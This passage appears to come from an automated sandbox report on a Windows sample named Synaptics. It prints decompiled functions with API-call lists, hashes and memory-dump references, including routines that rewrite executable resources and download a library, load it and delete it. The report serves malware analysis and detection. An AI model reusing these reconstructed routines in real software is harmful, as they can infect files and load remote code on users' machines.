                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000), ref: 004739A6
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016), ref: 004739E8
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000), ref: 004739FB
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000), ref: 00473A01
                                                                                                                                                                                          • BeginUpdateResourceA.KERNEL32 ref: 00473A0D
                                                                                                                                                                                          • UpdateResourceA.KERNEL32 ref: 00473A25
                                                                                                                                                                                          • EndUpdateResourceA.KERNEL32 ref: 00473A2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ReadResourceUpdate$Pointer$BeginCloseCreateHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2954177348-0
                                                                                                                                                                                          • Opcode ID: 9522758cda620d7937e954bd002cd9686f891998189a58d4f8e587062540acf1
                                                                                                                                                                                          • Instruction ID: bc58bece930a9ee3c191066ba21d3152ea947465ec18ce8fe9039474e398f891
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9522758cda620d7937e954bd002cd9686f891998189a58d4f8e587062540acf1
                                                                                                                                                                                          • Instruction Fuzzy Hash: A33147707443057EE210EB598C46F6BB7DC9F44704F00442EBA59EB2C2D6B9F904976E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00455F20 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00455F20(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E00441704( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                                                                                                                                                                          0x00455f27
                                                                                                                                                                                          0x00455f31
                                                                                                                                                                                          0x00455f3a
                                                                                                                                                                                          0x00455f44
                                                                                                                                                                                          0x00455f4d
                                                                                                                                                                                          0x00455f57
                                                                                                                                                                                          0x00455f70
                                                                                                                                                                                          0x00455f7f
                                                                                                                                                                                          0x00455f89
                                                                                                                                                                                          0x00455f96
                                                                                                                                                                                          0x00455fa3
                                                                                                                                                                                          0x00455fb0
                                                                                                                                                                                          0x00455fbd
                                                                                                                                                                                          0x00455fca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00455fd7
                                                                                                                                                                                          0x00455feb
                                                                                                                                                                                          0x00455ff5
                                                                                                                                                                                          0x00455ff5
                                                                                                                                                                                          0x00455ffd
                                                                                                                                                                                          0x00456007
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00456011
                                                                                                                                                                                          0x00456007
                                                                                                                                                                                          0x00455f57
                                                                                                                                                                                          0x00455f44
                                                                                                                                                                                          0x00456018

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 00455F6B
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00455F89
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455F96
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FA3
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00455FB0
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00455FBD
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00455FCA
                                                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00455FD7
                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 00455FF5
                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 00456011
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3985193851-0
                                                                                                                                                                                          • Opcode ID: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                          • Instruction ID: b5346b1c8bd95bffcca62109fe31ea1f8cc395b33158847c9b815f432f914529
                                                                                                                                                                                          • Opcode Fuzzy Hash: 46a722b8eeeea243d78a8bad53259dfb526ef96efbc8dad51e559871ae0294e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91215E707C53047AE320DB64CD8EFA97AD95B14B1AF1450A5BA447F6D3C6BCFA80861C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004214B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x49de40; // 0x49e034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x49dbc8; // 0x41744c
					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00404378();
				}
				if(_t53 <= 0) {
					E0042146C();
				} else {
					E00421478(_t53);
				}
				_v16 = 0;
				_push(0x49e86c);
				L00406FE0();
				_push(_t72);
				_push(0x421646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0049B5C4, _v16);
				_push(_t72);
				_push(0x421627);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0042162E);
					return E00403BEC(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0041AC6C(_v16, 0);
						E0041AB5C(_v16, 0);
						L004071A0();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x4215c2;
						 *[fs:eax] = _t67;
						_push(E004215F8);
						_push(0x49e86c);
						L00406FE0();
						return 0;
					} else {
						goto L14;
					}
				}
			}



















                                                                                                                                                                                          0x004214b9
                                                                                                                                                                                          0x004214bb
                                                                                                                                                                                          0x004214bf
                                                                                                                                                                                          0x004214c0
                                                                                                                                                                                          0x004214c1
                                                                                                                                                                                          0x004214c3
                                                                                                                                                                                          0x004214c8
                                                                                                                                                                                          0x004214d0
                                                                                                                                                                                          0x004214d7
                                                                                                                                                                                          0x004214da
                                                                                                                                                                                          0x004214e4
                                                                                                                                                                                          0x004214f1
                                                                                                                                                                                          0x004214f6
                                                                                                                                                                                          0x004214f6
                                                                                                                                                                                          0x004214fd
                                                                                                                                                                                          0x00421508
                                                                                                                                                                                          0x004214ff
                                                                                                                                                                                          0x00421501
                                                                                                                                                                                          0x00421501
                                                                                                                                                                                          0x0042150f
                                                                                                                                                                                          0x00421512
                                                                                                                                                                                          0x00421517
                                                                                                                                                                                          0x0042151e
                                                                                                                                                                                          0x0042151f
                                                                                                                                                                                          0x00421524
                                                                                                                                                                                          0x00421527
                                                                                                                                                                                          0x00421538
                                                                                                                                                                                          0x0042153d
                                                                                                                                                                                          0x0042153e
                                                                                                                                                                                          0x00421543
                                                                                                                                                                                          0x00421546
                                                                                                                                                                                          0x0042154d
                                                                                                                                                                                          0x00421558
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155c
                                                                                                                                                                                          0x0042155e
                                                                                                                                                                                          0x00421565
                                                                                                                                                                                          0x00421611
                                                                                                                                                                                          0x00421613
                                                                                                                                                                                          0x00421616
                                                                                                                                                                                          0x00421619
                                                                                                                                                                                          0x00421626
                                                                                                                                                                                          0x0042156b
                                                                                                                                                                                          0x0042160b
                                                                                                                                                                                          0x0042157a
                                                                                                                                                                                          0x00421582
                                                                                                                                                                                          0x0042158c
                                                                                                                                                                                          0x0042159c
                                                                                                                                                                                          0x004215aa
                                                                                                                                                                                          0x004215b5
                                                                                                                                                                                          0x004215ba
                                                                                                                                                                                          0x004215bd
                                                                                                                                                                                          0x004215db
                                                                                                                                                                                          0x004215de
                                                                                                                                                                                          0x004215e1
                                                                                                                                                                                          0x004215e6
                                                                                                                                                                                          0x004215eb
                                                                                                                                                                                          0x004215f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042160b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004214C3
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004214D2
                                                                                                                                                                                            • Part of subcall function 0042146C: ResetEvent.KERNEL32(00000214,0042150D,?,?,00000000), ref: 00421472
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,?,?,00000000), ref: 00421517
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(0049B5C4,?), ref: 00421533
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 0042158C
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,004215F8,00421627,?,00000000,00421646,?,0049E86C,?,?,00000000), ref: 004215EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                                                                          • String ID: 4I$LtA
                                                                                                                                                                                          • API String ID: 2189153385-4143330910
                                                                                                                                                                                          • Opcode ID: 946f9146f29649b49dd4f1ff1bbaa8d6da673d86ace4907c82a900981acf1411
                                                                                                                                                                                          • Instruction ID: c7144f3b078a98dbb88dc3215a2fca8a3d1431468ba3915c2d0e15c961d82a4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 946f9146f29649b49dd4f1ff1bbaa8d6da673d86ace4907c82a900981acf1411
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA31EA30B04204BFD711DF65E852A6D7BF8EB59704F9184B7F401932A1D77D9D40CA29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00495084 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 101libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E00495084(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t55;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HINSTANCE__* _t82;
				void* _t84;
				intOrPtr _t87;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(0x4951d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t84 = 3;
				_t55 = 0x49f0f4;
				do {
					if( *_t55 == 0) {
						goto L5;
					} else {
						_t68 =  *0x49f100; // 0x0
						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
							_v5 = 0;
							goto L5;
						} else {
							_v5 = 1;
							_t72 =  *0x49f100; // 0x0
							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
							_t82 = LoadLibraryA(E00404E80(_v16));
							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
							_t74 =  *0x49f100; // 0x0
							E00404CCC( &_v20, "\\libeay32.dll", _t74);
							E0041DD9C(_t30, _t56, _v20, _t82);
							E00403BEC(_t56);
							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
							_t8 =  &_v24; // 0x495430
							_t77 =  *0x49f100; // 0x0
							E00404CCC(_t8, "\\ssleay32.dll", _t77);
							_t9 =  &_v24; // 0x495430
							E0041DD9C(_t38, _t57,  *_t9, _t82);
							E00403BEC(_t57);
							FreeLibrary(_t82);
							_t79 =  *0x49f100; // 0x0
							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
							E00404BB8( &_v28, E00404E80(_v32));
							E00409BAC(_v28);
						}
					}
					break;
					L5:
					_t55 = _t55 + 4;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(0x4951db);
				return E004049E4( &_v32, 6);
			}




















                                                                                                                                                                                          0x00495089
                                                                                                                                                                                          0x0049508a
                                                                                                                                                                                          0x0049508b
                                                                                                                                                                                          0x0049508c
                                                                                                                                                                                          0x0049508d
                                                                                                                                                                                          0x0049508e
                                                                                                                                                                                          0x0049508f
                                                                                                                                                                                          0x00495090
                                                                                                                                                                                          0x00495091
                                                                                                                                                                                          0x00495095
                                                                                                                                                                                          0x00495096
                                                                                                                                                                                          0x0049509b
                                                                                                                                                                                          0x0049509e
                                                                                                                                                                                          0x004950a1
                                                                                                                                                                                          0x004950a6
                                                                                                                                                                                          0x004950ab
                                                                                                                                                                                          0x004950ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004950b4
                                                                                                                                                                                          0x004950bc
                                                                                                                                                                                          0x004950c2
                                                                                                                                                                                          0x004950d3
                                                                                                                                                                                          0x004951ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004950d9
                                                                                                                                                                                          0x004950d9
                                                                                                                                                                                          0x004950e5
                                                                                                                                                                                          0x004950eb
                                                                                                                                                                                          0x004950fe
                                                                                                                                                                                          0x00495115
                                                                                                                                                                                          0x0049511f
                                                                                                                                                                                          0x00495125
                                                                                                                                                                                          0x0049512f
                                                                                                                                                                                          0x00495136
                                                                                                                                                                                          0x00495150
                                                                                                                                                                                          0x00495152
                                                                                                                                                                                          0x0049515a
                                                                                                                                                                                          0x00495160
                                                                                                                                                                                          0x00495165
                                                                                                                                                                                          0x0049516a
                                                                                                                                                                                          0x00495171
                                                                                                                                                                                          0x00495177
                                                                                                                                                                                          0x00495184
                                                                                                                                                                                          0x0049518a
                                                                                                                                                                                          0x0049519c
                                                                                                                                                                                          0x004951a4
                                                                                                                                                                                          0x004951a4
                                                                                                                                                                                          0x004950d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004951af
                                                                                                                                                                                          0x004951af
                                                                                                                                                                                          0x004951b2
                                                                                                                                                                                          0x004951b2
                                                                                                                                                                                          0x004951bb
                                                                                                                                                                                          0x004951be
                                                                                                                                                                                          0x004951c1
                                                                                                                                                                                          0x004951d3

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                            • Part of subcall function 00474D50: InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                            • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                            • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0049528F), ref: 004950F9
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                                                                                                                                                            • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,022B2A8C,022B2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                                                                                                                                                          • String ID: 0TI$LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                                                                                                                                                          • API String ID: 1893608559-2441048562
                                                                                                                                                                                          • Opcode ID: f1fe62157a92b79a0211213fa2afb9312ef1ab2ad64b1eb0a31bc24c440c9176
                                                                                                                                                                                          • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1fe62157a92b79a0211213fa2afb9312ef1ab2ad64b1eb0a31bc24c440c9176
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                                                                                                                                                          0x0040d067
                                                                                                                                                                                          0x0040d06c
                                                                                                                                                                                          0x0040d074
                                                                                                                                                                                          0x0040d0db
                                                                                                                                                                                          0x0040d0e0
                                                                                                                                                                                          0x0040d0e4
                                                                                                                                                                                          0x0040d0ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040d105
                                                                                                                                                                                          0x0040d076
                                                                                                                                                                                          0x0040d080
                                                                                                                                                                                          0x0040d08f
                                                                                                                                                                                          0x0040d09f
                                                                                                                                                                                          0x0040d0b2
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                            • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                            • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                            • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                          • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                                                                                                                                                          • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                          • String ID: LI
                                                                                                                                                                                          • API String ID: 185507032-1163166679
                                                                                                                                                                                          • Opcode ID: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                          • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043AB98 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43ad44; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43ad3c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43ad44; // 0x0
				if(_t113 != (_t107 &  *0x43ad40)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43ad44; // 0x0
				if(_t114 != (_t107 &  *0x43ad48)) {
